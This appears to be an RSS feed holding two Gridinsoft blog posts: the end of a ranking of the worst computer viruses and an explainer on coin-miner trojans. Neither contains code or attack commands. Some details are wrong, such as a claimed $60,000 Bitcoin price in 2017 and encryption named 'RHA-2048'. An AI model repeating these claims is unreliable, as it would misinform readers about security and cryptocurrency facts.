    Spyware stealthiness makes it a tough nut for antivirus programs. Security tools often struggle to detect spyware correctly with a heuristic engine. Even if it detects one, you will probably see the detection of the “generic” type, which sometimes refers to a false detection and is thus ignored.

    3. Banking trojans

    What can be worse than getting your personal information stolen? Sure, getting your banking information stolen. And we are talking not only about card numbers and CVV code – they are important, but almost useless without the transaction approval. Modern banking trojans aim at your online banking – exactly, on login and password for it. Having them, crooks are free to manage your money.

    Banking trojan page
    The page displayed by the most primitive banking trojans

    Sometimes, banking trojans are combined with other malware – embedded into spyware, rogue software or phishing trojans. Since they aim at seriously protected things – online banking login forms – they are made by professionals. And it is a bad idea to ignore their efficiency – otherwise, you will have to ignore zeros on your banking account. Or, possibly, huge credit lines.

    2nd place – Wiper virus

    This type of malware was always very rare, but its danger can not be underestimated. Wiper malware is one that destroys your disk partitions. That malware is not about making money on you – it is just for revenge or mischief. Having your disk partition broken, you lose access to all your files and also to your operating system. UEFI is just not able to find the boot record of your OS – all data you have on your disks are just a weird mixture of non-structured bytes. Wiper malware is so rare that some of the anti-malware programs do not even have them in their detection databases.

    Such a malicious program needs access to your system at the driver level. Hence, it is obvious to wait for the hazard from the program that pretends to be the driver updater, “system optimization tool”, or other deep-configuration stuff. Overall, such tools are considered dangerous because of their questionable functionality. And the chance to get your logical disks ruined complements this danger.

    Worst computer virus ever. Ransomware

    What is more painful than to get your disk partitions destroyed? Yes, to get your files ciphered. While partitions can be recovered – thanks to the special tools available for LiveCD launch – files attacked by ransomware are impossible to fix. Exactly, there are decryption tools for several ransomware families, but none of them give you a guarantee that you will get your files back. The guaranteed way to decrypt your data is to pay the ransom – $1000 and more.

    Worst computer virus: Ransomware LockFile ProxyShell and PetitPotam
    Ransomware note

    Ransomware uses military-grade encryption – AES-256, RHA-1024, RHA-2048, or even ECC. Decrypting it with brute force can take more time than our universe exists. The only lucky chance of getting your files back without paying the ransom is to get encrypted with the flaw-by-design ransomware. The only well-known ransomware family that has flaws in its encryption key is HiddenTear – but its most modern variants have these breaches fixed. Another way to get the decryption key is to wait for the ransomware group to shut down. But even this does not give you any guarantees.

    Ransomware also deals heavy damage to your system configurations. To prevent the usage of anti-malware software, it blocks access to the websites of the vendors that are listed on the VirusTotal site. Moreover, it also blocks the launching of antivirus software installation files. It means that your HOSTS files, along with Group Policies, suffered significant changes. If you just manage to remove ransomware, ignoring the system recovery, you will probably see your system malfunctioning.

    Share this article and don’t forget to say your opinion on the worst computer virus in the comments. We will add the most interesting variants to the text – so describe them well. Good luck!

    The post What is the worst computer virus? Figuring out appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/worst-computer-virus/feed/ 0 6711
    Coin Miner – What is it? https://gridinsoft.com/blogs/about-coin-miner/ https://gridinsoft.com/blogs/about-coin-miner/#respond Wed, 27 Jan 2021 14:27:13 +0000 https://blog.gridinsoft.com/?p=1277 Throughout the timeline of the trojan virus evolution, it obtained a lot of different forms. They have become global malware that can exploit your computer as it wants. In this article, I will tell you about the particular type of trojan virus – Trojan Coin Miners, also known as “Coin Miner Virus”. Coin miners: essence,… Continue reading Coin Miner – What is it?

    The post Coin Miner – What is it? appeared first on Gridinsoft Blog.

    ]]>
    Throughout the timeline of the trojan virus evolution, it obtained a lot of different forms. They have become global malware that can exploit your computer as it wants. In this article, I will tell you about the particular type of trojan virusTrojan Coin Miners, also known as “Coin Miner Virus”1.

    Coin miners: essence, spreading and reasons for appearing

    The first trojan virus that could use the infected machine for cryptocurrency mining appeared in 2016. But their appearance was not explosive: there was no reason for their massive distribution. Cryptocurrencies were still unpopular, and their prices were low, so the cyber burglars saw no potential in such a type of malware.

    The things changed in 2017 when the first cryptocurrency rush occurred2. Bitcoin reached the $60000 price tag for a single coin, and other crypto coins, like Ethereum, Litecoin, or Ripple, were also at their highs. This type of equity has attracted (and still attracts) the big money, and where big money is, the people who want to have an illegal bite of this money appear.

    Peak of trojan-miner activity was reached in March 2018. When the price of Bitcoin shed back to $5000, coin miners’ activity dropped, too. The graphic below can easily prove the strict correlation between miners’ activity and the prices of cryptocurrencies.

    Graphic of coin miners activity and Bitcoin price

    In the summer of 2021, when the cryptocurrency price began pumping again, trojan miners quickly rose to the peak of 2018 and kept going as the Bitcoin price rose to $40000. Nowadays, coin-mining trojans are as active as they have ever been.

    How can I detect that my PC is infected with coin miner trojan?

    Have you ever tried to use an old computer with fresh Windows? The system freezes on every operation because of the lack of RAM and the slow reading speed of the HDD, so the operating system is forced to load the files from RAM out to the swap file. Coin miners can force you to remember these feelings. Your CPU and GPU are loaded to 100%, regardless of the number of launched programs. Google Chrome opens for more than one minute; attempting to open Photoshop may lead to its crash, and you can do nothing to deal with this problem. And it doesn’t matter if your computer is a high-end PC – even systems with Core i9-12900KF/Ryzen 7 6800H and RTX 3090 will suffer.

    Coin miner consumes the 95% of CPU capacity

    If you have the described symptoms, you have the coin miner in your system. The last thing that can ensure this decision is a strange process in the Task Manager. Sometimes, coin miner developers do not try to hide it, naming the process created as “miner” or “trainer”. Whatever it was, this process will consume an enormous amount of your CPU/GPU capacities, so you will easily distinguish it from other processes.

    Are coin miners dangerous?

    There is a widespread misconception that coin miners carry no danger to your computer because they load your hardware to the max values. Such a conception may be true for users who regularly check their PC to detect hardware issues, such as dust in the coolers or breaking in the moving parts. But what about the average user who cleans the dust from the cooling fan only after it whines loudly after the PC launch? Or individuals who have a bad/weak power supply, so it generates the pulsating current?3

    In the mentioned cases, a long overload with a high chance may lead to the components breaking. The CPU is sensitive to overheating, and it is quite simple to make it boil with a malfunctioning cooling system. Pulsating current is even more dangerous: such voltage volatility can easily break some components and kill the whole motherboard, so you will need to buy a new one besides the broken hardware.

    Coin Miner – What is it?

    The danger of hardware damage is not the single thing you need to be afraid of. Due to the modern trend of making the virus complex, your PC will likely be infected with numerous other viruses. Choose what you like: spyware, keyloggers, adware, backdoors, and even ransomware. The possible danger that this malware may carry is enormous – data/credentials stealing, file encryption, including your PC to the botnet, remote controlling – that is not a full list of the consequences. It is recommended to scan your computer as soon as possible and remove all malicious items in your system.

    The post Coin Miner – What is it? appeared first on Gridinsoft Blog.

    ]]>
    https://gridinsoft.com/blogs/about-coin-miner/feed/ 0 1277